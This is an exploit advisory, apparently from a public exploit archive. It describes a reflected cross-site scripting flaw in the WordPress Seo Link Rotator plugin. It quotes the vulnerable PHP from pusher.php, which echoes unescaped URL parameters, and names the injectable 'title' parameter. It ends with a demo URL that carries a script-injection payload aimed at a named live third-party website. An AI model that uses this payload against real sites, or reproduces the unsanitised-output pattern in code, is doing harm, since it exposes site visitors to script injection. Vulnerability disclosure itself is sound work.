WordPress Seo Link Rotator plugin suffers from a cross site scripting vulnerability.
396ce83d6ac42563fd0a710f4db39ced9b30c7118dc539f7f1e5c4936c37f350
######################
# Exploit Title : Wordpress Seo Link Rotator Plugin Cross Site Scripting
# Exploit Author : ACC3SS
# Vendor Homepage : http://www.seolinkrotator.com
# Software Link :
http://www.seolinkrotator.com/download/files/seolinkrotator.zip
# Date : 2014-01-19
# Tested on : Windows 7 / Mozilla Firefox Web Browser
# Discovered by : ACC3SS
######################
# Vulnerability code :
<?php
$action = $_GET['action'];
switch($action){
case "buildLink":
$linkURL = $_GET['URL'];
$linkTitle = urldecode($_GET['title']);
$type = $_GET['type'];
?>
<div class="seoLinkRotatorInfo">
<h2>Link To This <?=ucwords($type)?></h2>
<p>If you would like to share this <?=$type?> with someone else
just copy and paste the HTML into one of your pages:</p>
<div class="seoLinkHTMLBox">
<?php
echo '<a href="' . $linkURL . '">' . $linkTitle .
'<a>';
?>
</div>
</div>
<?php
break;
default:
echo 'Unkown action';
break;
}
?>
######################
# Location :
localhost/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=[Xss]
######################
# Demo :
#
http://www.porterpr.com/wp-content/plugins/seolinkrotator/pusher.php?action=buildLink&title=
"/><script>alert(1);</script>
######################